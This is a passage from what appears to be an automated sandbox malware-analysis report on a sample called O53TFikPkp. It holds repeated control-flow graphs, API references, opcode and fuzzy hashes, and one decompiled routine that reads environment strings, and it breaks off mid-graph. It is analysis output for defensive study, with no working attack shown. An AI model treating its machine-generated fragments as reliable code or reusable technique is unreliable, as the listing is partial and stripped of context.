                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 1b3afb3ea408b815937ca5000b12647a9712dd4ad1a71207910a0aa50d72a71a
                                                                                            • Instruction ID: 5a5c5b26b22f023053e951fe567f4ffeeca0de1dbfd4b800ab555cdac103ca82
                                                                                            • Opcode Fuzzy Hash: 1b3afb3ea408b815937ca5000b12647a9712dd4ad1a71207910a0aa50d72a71a
                                                                                            • Instruction Fuzzy Hash: 4C2208B4A01229CFCB24DF24D95469CBBB6BF89306F5084E9D609A7341CF399E82CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2666 711043-71107f 2671 711086-7110ac 2666->2671 2673 7110b2-7110c4 2671->2673 2674 7110cb-711103 KiUserExceptionDispatcher 2673->2674 2676 71110d-71111f 2674->2676 2677 711126-71114c 2676->2677 2929 71114c call 46b837 2677->2929 2930 71114c call 46b7d8 2677->2930 2679 711152-711164 2680 71116b-711191 2679->2680 2682 711197-7111ee 2680->2682 2686 7111f5-711212 2682->2686 2931 711212 call 46bf00 2686->2931 2932 711212 call 46bce8 2686->2932 2688 711218-71122a 2689 711231-711257 2688->2689 2691 71125d-71126f 2689->2691 2692 711276-711293 2691->2692 2936 711293 call 46d457 2692->2936 2937 711293 call 46da67 2692->2937 2938 711293 call 46da08 2692->2938 2939 711293 call 46dac8 2692->2939 2694 711299-7112ab 2695 7112b2-7112d8 2694->2695 2940 7112d8 call 46db87 2695->2940 2941 7112d8 call 46dac8 2695->2941 2942 7112d8 call 46db28 2695->2942 2943 7112d8 call 46dbe8 2695->2943 2697 7112de-7112f0 2698 7112f7-71131d 2697->2698 2920 71131d call 46dbe8 2698->2920 2921 71131d call 46dc48 2698->2921 2700 711323-71134b 2702 711352-711378 2700->2702 2922 711378 call 46e6f0 2702->2922 2923 711378 call 46ea60 2702->2923 2704 71137e-711390 2705 711397-7113bd 2704->2705 2707 7113c3-7113d5 2705->2707 2708 7113dc-711405 2707->2708 2710 71140b-71141d 2708->2710 2711 711424-711441 2710->2711 2924 711441 call 46f650 2711->2924 2925 711441 call 46f700 2711->2925 2926 711441 call 46f75f 2711->2926 2713 711447-711459 2714 711460-711489 2713->2714 2927 711489 call 46f820 2714->2927 2928 711489 call 46f8b0 2714->2928 2716 71148f-7114e9 2720 7114f0-71150d 2716->2720 2722 711513-71156d 2720->2722 2726 711574-711591 2722->2726 2728 711597-7115a9 2726->2728 2729 7115b0-7115d9 2728->2729 2731 7115df-7115f1 2729->2731 2732 7115f8-711621 2731->2732 2734 711627-711639 2732->2734 2735 711640-711669 2734->2735 2737 71166f-711681 2735->2737 2738 711688-7116b1 2737->2738 2740 7116b7-7116c9 2738->2740 2741 7116d0-7116f9 2740->2741 2743 7116ff-711711 2741->2743 2744 711718-711741 2743->2744 2746 711747-711759 2744->2746 2747 711760-711789 2746->2747 2749 71178f-7117a1 2747->2749 2750 7117a8-7117d1 2749->2750 2752 7117d7-7117e9 2750->2752 2753 7117f0-711819 2752->2753 2755 71181f-711831 2753->2755 2756 711838-711861 2755->2756 2758 711867-711879 2756->2758 2759 711880-71189d 2758->2759 2761 7118a3-7118fd 2759->2761 2765 711904-71192d 2761->2765 2767 711933-711945 2765->2767 2768 71194c-711975 2767->2768 2770 71197b-71198d 2768->2770 2771 711994-7119bd 2770->2771 2773 7119c3-7119d5 2771->2773 2774 7119dc-711a05 2773->2774 2776 711a0b-711a1d 2774->2776 2777 711a24-711a95 KiUserExceptionDispatcher 2776->2777 2781 711a9b-711aad 2777->2781 2782 711ab4-711add 2781->2782 2784 711ae3-711af5 2782->2784 2785 711afc-711b25 2784->2785 2787 711b2b-711b3d 2785->2787 2788 711b44-711b6d 2787->2788 2790 711b73-711bbf 2788->2790 2793 711bc5-711be8 2790->2793 2794 711ebb-711ecc 2790->2794 2806 711ea3-711eb8 2793->2806 2807 711bee-711c60 2793->2807 2797 711ed2-711ed9 2794->2797 2798 71222b-712232 2794->2798 2800 711edf-711ee5 2797->2800 2801 711f6e-711f75 2797->2801 2802 7122b4-7122be 2798->2802 2803 712238-7122a9 2798->2803 2818 711eed 2800->2818 2808 7120e3-7120ea 2801->2808 2809 711f7b-7120be 2801->2809 2804 7122c0-7122ee 2802->2804 2805 712304-712316 2802->2805 2803->2802 2835 7122f5-7122fd 2804->2835 2806->2794 2836 711c66-711c6d 2807->2836 2837 711e8b-711e9d 2807->2837 2808->2798 2812 7120f0-71220e 2808->2812 2809->2798 2812->2798 2825 711ef9-711f16 2818->2825 2839 711f21-711f31 2825->2839 2835->2805 2841 711c73-711d89 2836->2841 2842 711d8e-711db9 2836->2842 2837->2806 2837->2807 2933 711f37 call 8c09e0 2839->2933 2934 711f37 call 8c09f0 2839->2934 2935 711f37 call 8c0a80 2839->2935 2841->2837 2842->2837 2846 711dbf-711e62 2842->2846 2846->2837 2847 711f3d 2847->2798 2920->2700 2921->2700 2922->2704 2923->2704 2924->2713 2925->2713 2926->2713 2927->2716 2928->2716 2929->2679 2930->2679 2931->2688 2932->2688 2933->2847 2934->2847 2935->2847 2936->2694 2937->2694 2938->2694 2939->2694 2940->2697 2941->2697 2942->2697 2943->2697
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 4453c4f90a58a8e026de6eb8fcf5835a31d42483d5ff2d087f726a67fcf42b8f
                                                                                            • Instruction ID: 274ffde82ad4a1efe7b045c958bf5673d6d644e04291f2ad02539ba8e6d13e88
                                                                                            • Opcode Fuzzy Hash: 4453c4f90a58a8e026de6eb8fcf5835a31d42483d5ff2d087f726a67fcf42b8f
                                                                                            • Instruction Fuzzy Hash: 472209B4A01229CFCB24DF24D95469CBBB6BF89306F5084E9D609A7341CF359E82CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2944 711088-71109f 2946 7110a7-7110ac 2944->2946 2948 7110b2-7110c4 2946->2948 2949 7110cb-711103 KiUserExceptionDispatcher 2948->2949 2951 71110d-71111f 2949->2951 2952 711126-71114c 2951->2952 3217 71114c call 46b837 2952->3217 3218 71114c call 46b7d8 2952->3218 2954 711152-711164 2955 71116b-711191 2954->2955 2957 711197-7111ee 2955->2957 2961 7111f5-711212 2957->2961 3195 711212 call 46bf00 2961->3195 3196 711212 call 46bce8 2961->3196 2963 711218-71122a 2964 711231-711257 2963->2964 2966 71125d-71126f 2964->2966 2967 711276-711293 2966->2967 3200 711293 call 46d457 2967->3200 3201 711293 call 46da67 2967->3201 3202 711293 call 46da08 2967->3202 3203 711293 call 46dac8 2967->3203 2969 711299-7112ab 2970 7112b2-7112d8 2969->2970 3204 7112d8 call 46db87 2970->3204 3205 7112d8 call 46dac8 2970->3205 3206 7112d8 call 46db28 2970->3206 3207 7112d8 call 46dbe8 2970->3207 2972 7112de-7112f0 2973 7112f7-71131d 2972->2973 3208 71131d call 46dbe8 2973->3208 3209 71131d call 46dc48 2973->3209 2975 711323-71134b 2977 711352-711378 2975->2977 3210 711378 call 46e6f0 2977->3210 3211 711378 call 46ea60 2977->3211 2979 71137e-711390 2980 711397-7113bd 2979->2980 2982 7113c3-7113d5 2980->2982 2983 7113dc-711405 2982->2983 2985 71140b-71141d 2983->2985 2986 711424-711441 2985->2986 3212 711441 call 46f650 2986->3212 3213 711441 call 46f700 2986->3213 3214 711441 call 46f75f 2986->3214 2988 711447-711459 2989 711460-711489 2988->2989 3215 711489 call 46f820 2989->3215 3216 711489 call 46f8b0 2989->3216 2991 71148f-7114e9 2995 7114f0-71150d 2991->2995 2997 711513-71156d 2995->2997 3001 711574-711591 2997->3001 3003 711597-7115a9 3001->3003 3004 7115b0-7115d9 3003->3004 3006 7115df-7115f1 3004->3006 3007 7115f8-711621 3006->3007 3009 711627-711639 3007->3009 3010 711640-711669 3009->3010 3012 71166f-711681 3010->3012 3013 711688-7116b1 3012->3013 3015 7116b7-7116c9 3013->3015 3016 7116d0-7116f9 3015->3016 3018 7116ff-711711 3016->3018 3019 711718-711741 3018->3019 3021 711747-711759 3019->3021 3022 711760-711789 3021->3022 3024 71178f-7117a1 3022->3024 3025 7117a8-7117d1 3024->3025 3027 7117d7-7117e9 3025->3027 3028 7117f0-711819 3027->3028 3030 71181f-711831 3028->3030 3031 711838-711861 3030->3031 3033 711867-711879 3031->3033 3034 711880-71189d 3033->3034 3036 7118a3-7118fd 3034->3036 3040 711904-71192d 3036->3040 3042 711933-711945 3040->3042 3043 71194c-711975 3042->3043 3045 71197b-71198d 3043->3045 3046 711994-7119bd 3045->3046 3048 7119c3-7119d5 3046->3048 3049 7119dc-711a05 3048->3049 3051 711a0b-711a1d 3049->3051 3052 711a24-711a95 KiUserExceptionDispatcher 3051->3052 3056 711a9b-711aad 3052->3056 3057 711ab4-711add 3056->3057 3059 711ae3-711af5 3057->3059 3060 711afc-711b25 3059->3060 3062 711b2b-711b3d 3060->3062 3063 711b44-711b6d 3062->3063 3065 711b73-711bbf 3063->3065 3068 711bc5-711be8 3065->3068 3069 711ebb-711ecc 3065->3069 3081 711ea3-711eb8 3068->3081 3082 711bee-711c60 3068->3082 3072 711ed2-711ed9 3069->3072 3073 71222b-712232 3069->3073 3075 711edf-711ee5 3072->3075 3076 711f6e-711f75 3072->3076 3077 7122b4-7122be 3073->3077 3078 712238-7122a9 3073->3078 3093 711eed 3075->3093 3083 7120e3-7120ea 3076->3083 3084 711f7b-7120be 3076->3084 3079 7122c0-7122ee 3077->3079 3080 712304-712316 3077->3080 3078->3077 3110 7122f5-7122fd 3079->3110 3081->3069 3111 711c66-711c6d 3082->3111 3112 711e8b-711e9d 3082->3112 3083->3073 3087 7120f0-71220e 3083->3087 3084->3073 3087->3073 3100 711ef9-711f16 3093->3100 3114 711f21-711f31 3100->3114 3110->3080 3116 711c73-711d89 3111->3116 3117 711d8e-711db9 3111->3117 3112->3081 3112->3082 3197 711f37 call 8c09e0 3114->3197 3198 711f37 call 8c09f0 3114->3198 3199 711f37 call 8c0a80 3114->3199 3116->3112 3117->3112 3121 711dbf-711e62 3117->3121 3121->3112 3122 711f3d 3122->3073 3195->2963 3196->2963 3197->3122 3198->3122 3199->3122 3200->2969 3201->2969 3202->2969 3203->2969 3204->2972 3205->2972 3206->2972 3207->2972 3208->2975 3209->2975 3210->2979 3211->2979 3212->2988 3213->2988 3214->2988 3215->2991 3216->2991 3217->2954 3218->2954
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 2276b95bbab601bf14bd3fdf57d73c73047c8c02230986fef802d80bdba68c37
                                                                                            • Instruction ID: 164d1368cae4350ba5fd028fbe7868359e26522e19e37db89f07f1f98730205b
                                                                                            • Opcode Fuzzy Hash: 2276b95bbab601bf14bd3fdf57d73c73047c8c02230986fef802d80bdba68c37
                                                                                            • Instruction Fuzzy Hash: 521219B4A01229CFCB24DF24D95469CBBB6BF89306F5084E9D609A7341CF359E82CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 3219 7110cd-7110e4 3221 7110ec-711103 KiUserExceptionDispatcher 3219->3221 3223 71110d-71111f 3221->3223 3224 711126-71114c 3223->3224 3474 71114c call 46b837 3224->3474 3475 71114c call 46b7d8 3224->3475 3226 711152-711164 3227 71116b-711191 3226->3227 3229 711197-7111ee 3227->3229 3233 7111f5-711212 3229->3233 3476 711212 call 46bf00 3233->3476 3477 711212 call 46bce8 3233->3477 3235 711218-71122a 3236 711231-711257 3235->3236 3238 71125d-71126f 3236->3238 3239 711276-711293 3238->3239 3481 711293 call 46d457 3239->3481 3482 711293 call 46da67 3239->3482 3483 711293 call 46da08 3239->3483 3484 711293 call 46dac8 3239->3484 3241 711299-7112ab 3242 7112b2-7112d8 3241->3242 3485 7112d8 call 46db87 3242->3485 3486 7112d8 call 46dac8 3242->3486 3487 7112d8 call 46db28 3242->3487 3488 7112d8 call 46dbe8 3242->3488 3244 7112de-7112f0 3245 7112f7-71131d 3244->3245 3489 71131d call 46dbe8 3245->3489 3490 71131d call 46dc48 3245->3490 3247 711323-71134b 3249 711352-711378 3247->3249 3467 711378 call 46e6f0 3249->3467 3468 711378 call 46ea60 3249->3468 3251 71137e-711390 3252 711397-7113bd 3251->3252 3254 7113c3-7113d5 3252->3254 3255 7113dc-711405 3254->3255 3257 71140b-71141d 3255->3257 3258 711424-711441 3257->3258 3469 711441 call 46f650 3258->3469 3470 711441 call 46f700 3258->3470 3471 711441 call 46f75f 3258->3471 3260 711447-711459 3261 711460-711489 3260->3261 3472 711489 call 46f820 3261->3472 3473 711489 call 46f8b0 3261->3473 3263 71148f-7114e9 3267 7114f0-71150d 3263->3267 3269 711513-71156d 3267->3269 3273 711574-711591 3269->3273 3275 711597-7115a9 3273->3275 3276 7115b0-7115d9 3275->3276 3278 7115df-7115f1 3276->3278 3279 7115f8-711621 3278->3279 3281 711627-711639 3279->3281 3282 711640-711669 3281->3282 3284 71166f-711681 3282->3284 3285 711688-7116b1 3284->3285 3287 7116b7-7116c9 3285->3287 3288 7116d0-7116f9 3287->3288 3290 7116ff-711711 3288->3290 3291 711718-711741 3290->3291 3293 711747-711759 3291->3293 3294 711760-711789 3293->3294 3296 71178f-7117a1 3294->3296 3297 7117a8-7117d1 3296->3297 3299 7117d7-7117e9 3297->3299 3300 7117f0-711819 3299->3300 3302 71181f-711831 3300->3302 3303 711838-711861 3302->3303 3305 711867-711879 3303->3305 3306 711880-71189d 3305->3306 3308 7118a3-7118fd 3306->3308 3312 711904-71192d 3308->3312 3314 711933-711945 3312->3314 3315 71194c-711975 3314->3315 3317 71197b-71198d 3315->3317 3318 711994-7119bd 3317->3318 3320 7119c3-7119d5 3318->3320 3321 7119dc-711a05 3320->3321 3323 711a0b-711a1d 3321->3323 3324 711a24-711a95 KiUserExceptionDispatcher 3323->3324 3328 711a9b-711aad 3324->3328 3329 711ab4-711add 3328->3329 3331 711ae3-711af5 3329->3331 3332 711afc-711b25 3331->3332 3334 711b2b-711b3d 3332->3334 3335 711b44-711b6d 3334->3335 3337 711b73-711bbf 3335->3337 3340 711bc5-711be8 3337->3340 3341 711ebb-711ecc 3337->3341 3353 711ea3-711eb8 3340->3353 3354 711bee-711c60 3340->3354 3344 711ed2-711ed9 3341->3344 3345 71222b-712232 3341->3345 3347 711edf-711ee5 3344->3347 3348 711f6e-711f75 3344->3348 3349 7122b4-7122be 3345->3349 3350 712238-7122a9 3345->3350 3365 711eed 3347->3365 3355 7120e3-7120ea 3348->3355 3356 711f7b-7120be 3348->3356 3351 7122c0-7122ee 3349->3351 3352 712304-712316 3349->3352 3350->3349 3382 7122f5-7122fd 3351->3382 3353->3341 3383 711c66-711c6d 3354->3383 3384 711e8b-711e9d 3354->3384 3355->3345 3359 7120f0-71220e 3355->3359 3356->3345 3359->3345 3372 711ef9-711f16 3365->3372 3386 711f21-711f31 3372->3386 3382->3352 3388 711c73-711d89 3383->3388 3389 711d8e-711db9 3383->3389 3384->3353 3384->3354 3478 711f37 call 8c09e0 3386->3478 3479 711f37 call 8c09f0 3386->3479 3480 711f37 call 8c0a80 3386->3480 3388->3384 3389->3384 3393 711dbf-711e62 3389->3393 3393->3384 3394 711f3d 3394->3345 3467->3251 3468->3251 3469->3260 3470->3260 3471->3260 3472->3263 3473->3263 3474->3226 3475->3226 3476->3235 3477->3235 3478->3394 3479->3394 3480->3394 3481->3241 3482->3241 3483->3241 3484->3241 3485->3244 3486->3244 3487->3244 3488->3244 3489->3247 3490->3247
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 007110F1
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 0f618be5dbf553e299deb9d6c5ffc64e3eb8aa4ecae454fe50f1e5b2dc8afb66
                                                                                            • Instruction ID: 09736bb141a426db1702cf5a2b53ea2a72c56c66a4862ec6c78b26926bbe1dd4
                                                                                            • Opcode Fuzzy Hash: 0f618be5dbf553e299deb9d6c5ffc64e3eb8aa4ecae454fe50f1e5b2dc8afb66
                                                                                            • Instruction Fuzzy Hash: 4F1219B4A01228CFCB24DF24D95469CBBB6BF89306F5084E9D609A7341CF359E82CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 3491 4055c5-4055d3 GetEnvironmentStringsW 3492 4055d5-4055d7 3491->3492 3493 4055d9-4055e8 call 40558e call 403e3d 3491->3493 3494 405610-405614 3492->3494 3498 4055ed-4055f3 3493->3498 3499 405600-40560f call 403e03 FreeEnvironmentStringsW 3498->3499 3500 4055f5-4055fd call 40acf0 3498->3500 3499->3494 3500->3499
                                                                                            C-Code - Quality: 100%
                                                                                            			E004055C5(void* __ecx) {
                                                                                            				void* _t6;
                                                                                            				void* _t14;
                                                                                            				void* _t18;
                                                                                            				WCHAR* _t19;
                                                                                            
                                                                                            				_t14 = __ecx;
                                                                                            				_t19 = GetEnvironmentStringsW();
                                                                                            				if(_t19 != 0) {
                                                                                            					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                                                                                            					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                                                                                            					_t18 = _t6;
                                                                                            					if(_t18 != 0) {
                                                                                            						E0040ACF0(_t18, _t19, _t12);
                                                                                            					}
                                                                                            					E00403E03(0);
                                                                                            					FreeEnvironmentStringsW(_t19);
                                                                                            				} else {
                                                                                            					_t18 = 0;
                                                                                            				}
                                                                                            				return _t18;
                                                                                            			}







                                                                                            0x004055c5
                                                                                            0x004055cf
                                                                                            0x004055d3
                                                                                            0x004055e4
                                                                                            0x004055e8
                                                                                            0x004055ed
                                                                                            0x004055f3
                                                                                            0x004055f8
                                                                                            0x004055fd
                                                                                            0x00405602
                                                                                            0x00405609
                                                                                            0x004055d5
                                                                                            0x004055d5
                                                                                            0x004055d5
                                                                                            0x00405614

                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$Free
                                                                                            • String ID:
                                                                                            • API String ID: 3328510275-0
                                                                                            • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                                            • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                                                                            • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                                            • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 3828 711128-71113f 3830 711147-71114c 3828->3830 4095 71114c call 46b837 3830->4095 4096 71114c call 46b7d8 3830->4096 3832 711152-711164 3833 71116b-711191 3832->3833 3835 711197-7111ee 3833->3835 3839 7111f5-711212 3835->3839 4073 711212 call 46bf00 3839->4073 4074 711212 call 46bce8 3839->4074 3841 711218-71122a 3842 711231-711257 3841->3842 3844 71125d-71126f 3842->3844 3845 711276-711293 3844->3845 4078 711293 call 46d457 3845->4078 4079 711293 call 46da67 3845->4079 4080 711293 call 46da08 3845->4080 4081 711293 call 46dac8 3845->4081 3847 711299-7112ab 3848 7112b2-7112d8 3847->3848 4082 7112d8 call 46db87 3848->4082 4083 7112d8 call 46dac8 3848->4083 4084 7112d8 call 46db28 3848->4084 4085 7112d8 call 46dbe8 3848->4085 3850 7112de-7112f0 3851 7112f7-71131d 3850->3851 4086 71131d call 46dbe8 3851->4086 4087 71131d call 46dc48 3851->4087 3853 711323-71134b 3855 711352-711378 3853->3855 4088 711378 call 46e6f0 3855->4088 4089 711378 call 46ea60 3855->4089 3857 71137e-711390 3858 711397-7113bd 3857->3858 3860 7113c3-7113d5 3858->3860 3861 7113dc-711405 3860->3861 3863 71140b-71141d 3861->3863 3864 711424-711441 3863->3864 4090 711441 call 46f650 3864->4090 4091 711441 call 46f700 3864->4091 4092 711441 call 46f75f 3864->4092 3866 711447-711459 3867 711460-711489 3866->3867 4093 711489 call 46f820 3867->4093 4094 711489 call 46f8b0 3867->4094 3869 71148f-7114e9 3873 7114f0-71150d 3869->3873 3875 711513-71156d 3873->3875 3879 711574-711591 3875->3879 3881 711597-7115a9 3879->3881 3882 7115b0-7115d9 3881->3882 3884 7115df-7115f1 3882->3884 3885 7115f8-711621 3884->3885 3887 711627-711639 3885->3887 3888 711640-711669 3887->3888 3890 71166f-711681 3888->3890 3891 711688-7116b1 3890->3891 3893 7116b7-7116c9 3891->3893 3894 7116d0-7116f9 3893->3894 3896 7116ff-711711 3894->3896 3897 711718-711741 3896->3897 3899 711747-711759 3897->3899 3900 711760-711789 3899->3900 3902 71178f-7117a1 3900->3902 3903 7117a8-7117d1 3902->3903 3905 7117d7-7117e9 3903->3905 3906 7117f0-711819 3905->3906 3908 71181f-711831 3906->3908 3909 711838-711861 3908->3909 3911 711867-711879 3909->3911 3912 711880-71189d 3911->3912 3914 7118a3-7118fd 3912->3914 3918 711904-71192d 3914->3918 3920 711933-711945 3918->3920 3921 71194c-711975 3920->3921 3923 71197b-71198d 3921->3923 3924 711994-7119bd 3923->3924 3926 7119c3-7119d5 3924->3926 3927 7119dc-711a05 3926->3927 3929 711a0b-711a1d 3927->3929 3930 711a24-711a95 KiUserExceptionDispatcher 3929->3930 3934 711a9b-711aad 3930->3934 3935 711ab4-711add 3934->3935 3937 711ae3-711af5 3935->3937 3938 711afc-711b25 3937->3938 3940 711b2b-711b3d 3938->3940 3941 711b44-711b6d 3940->3941 3943 711b73-711bbf 3941->3943 3946 711bc5-711be8 3943->3946 3947 711ebb-711ecc 3943->3947 3959 711ea3-711eb8 3946->3959 3960 711bee-711c60 3946->3960 3950 711ed2-711ed9 3947->3950 3951 71222b-712232 3947->3951 3953 711edf-711ee5 3950->3953 3954 711f6e-711f75 3950->3954 3955 7122b4-7122be 3951->3955 3956 712238-7122a9 3951->3956 3971 711eed 3953->3971 3961 7120e3-7120ea 3954->3961 3962 711f7b-7120be 3954->3962 3957 7122c0-7122ee 3955->3957 3958 712304-712316 3955->3958 3956->3955 3988 7122f5-7122fd 3957->3988 3959->3947 3989 711c66-711c6d 3960->3989 3990 711e8b-711e9d 3960->3990 3961->3951 3965 7120f0-71220e 3961->3965 3962->3951 3965->3951 3978 711ef9-711f16 3971->3978 3992 711f21-711f31 3978->3992 3988->3958 3994 711c73-711d89 3989->3994 3995 711d8e-711db9 3989->3995 3990->3959 3990->3960 4075 711f37 call 8c09e0 3992->4075 4076 711f37 call 8c09f0 3992->4076 4077 711f37 call 8c0a80 3992->4077 3994->3990 3995->3990 3999 711dbf-711e62 3995->3999 3999->3990 4000 711f3d 4000->3951 4073->3841 4074->3841 4075->4000 4076->4000 4077->4000 4078->3847 4079->3847 4080->3847 4081->3847 4082->3850 4083->3850 4084->3850 4085->3850 4086->3853 4087->3853 4088->3857 4089->3857 4090->3866 4091->3866 4092->3866 4093->3869 4094->3869 4095->3832 4096->3832
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 4e28a8c32140f07fc2215b71172b3ed8c9f42fa17cdc0e908a9e374498c2bb32
                                                                                            • Instruction ID: fbf2f1446cd16746a45293d18d1fc02bcdf945bb43bbe732a9d82af25e285030
                                                                                            • Opcode Fuzzy Hash: 4e28a8c32140f07fc2215b71172b3ed8c9f42fa17cdc0e908a9e374498c2bb32
                                                                                            • Instruction Fuzzy Hash: 4D1209B4A01229CFCB24DF24D95469CBBB6BF89306F5084E9D609A7340CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 4097 71116d-711184 4099 71118c-711191 4097->4099 4101 711197-7111ee 4099->4101 4105 7111f5-711212 4101->4105 4341 711212 call 46bf00 4105->4341 4342 711212 call 46bce8 4105->4342 4107 711218-71122a 4108 711231-711257 4107->4108 4110 71125d-71126f 4108->4110 4111 711276-711293 4110->4111 4346 711293 call 46d457 4111->4346 4347 711293 call 46da67 4111->4347 4348 711293 call 46da08 4111->4348 4349 711293 call 46dac8 4111->4349 4113 711299-7112ab 4114 7112b2-7112d8 4113->4114 4350 7112d8 call 46db87 4114->4350 4351 7112d8 call 46dac8 4114->4351 4352 7112d8 call 46db28 4114->4352 4353 7112d8 call 46dbe8 4114->4353 4116 7112de-7112f0 4117 7112f7-71131d 4116->4117 4354 71131d call 46dbe8 4117->4354 4355 71131d call 46dc48 4117->4355 4119 711323-71134b 4121 711352-711378 4119->4121 4356 711378 call 46e6f0 4121->4356 4357 711378 call 46ea60 4121->4357 4123 71137e-711390 4124 711397-7113bd 4123->4124 4126 7113c3-7113d5 4124->4126 4127 7113dc-711405 4126->4127 4129 71140b-71141d 4127->4129 4130 711424-711441 4129->4130 4358 711441 call 46f650 4130->4358 4359 711441 call 46f700 4130->4359 4360 711441 call 46f75f 4130->4360 4132 711447-711459 4133 711460-711489 4132->4133 4339 711489 call 46f820 4133->4339 4340 711489 call 46f8b0 4133->4340 4135 71148f-7114e9 4139 7114f0-71150d 4135->4139 4141 711513-71156d 4139->4141 4145 711574-711591 4141->4145 4147 711597-7115a9 4145->4147 4148 7115b0-7115d9 4147->4148 4150 7115df-7115f1 4148->4150 4151 7115f8-711621 4150->4151 4153 711627-711639 4151->4153 4154 711640-711669 4153->4154 4156 71166f-711681 4154->4156 4157 711688-7116b1 4156->4157 4159 7116b7-7116c9 4157->4159 4160 7116d0-7116f9 4159->4160 4162 7116ff-711711 4160->4162 4163 711718-711741 4162->4163 4165 711747-711759 4163->4165 4166 711760-711789 4165->4166 4168 71178f-7117a1 4166->4168 4169 7117a8-7117d1 4168->4169 4171 7117d7-7117e9 4169->4171 4172 7117f0-711819 4171->4172 4174 71181f-711831 4172->4174 4175 711838-711861 4174->4175 4177 711867-711879 4175->4177 4178 711880-71189d 4177->4178 4180 7118a3-7118fd 4178->4180 4184 711904-71192d 4180->4184 4186 711933-711945 4184->4186 4187 71194c-711975 4186->4187 4189 71197b-71198d 4187->4189 4190 711994-7119bd 4189->4190 4192 7119c3-7119d5 4190->4192 4193 7119dc-711a05 4192->4193 4195 711a0b-711a1d 4193->4195 4196 711a24-711a95 KiUserExceptionDispatcher 4195->4196 4200 711a9b-711aad 4196->4200 4201 711ab4-711add 4200->4201 4203 711ae3-711af5 4201->4203 4204 711afc-711b25 4203->4204 4206 711b2b-711b3d 4204->4206 4207 711b44-711b6d 4206->4207 4209 711b73-711bbf 4207->4209 4212 711bc5-711be8 4209->4212 4213 711ebb-711ecc 4209->4213 4225 711ea3-711eb8 4212->4225 4226 711bee-711c60 4212->4226 4216 711ed2-711ed9 4213->4216 4217 71222b-712232 4213->4217 4219 711edf-711ee5 4216->4219 4220 711f6e-711f75 4216->4220 4221 7122b4-7122be 4217->4221 4222 712238-7122a9 4217->4222 4237 711eed 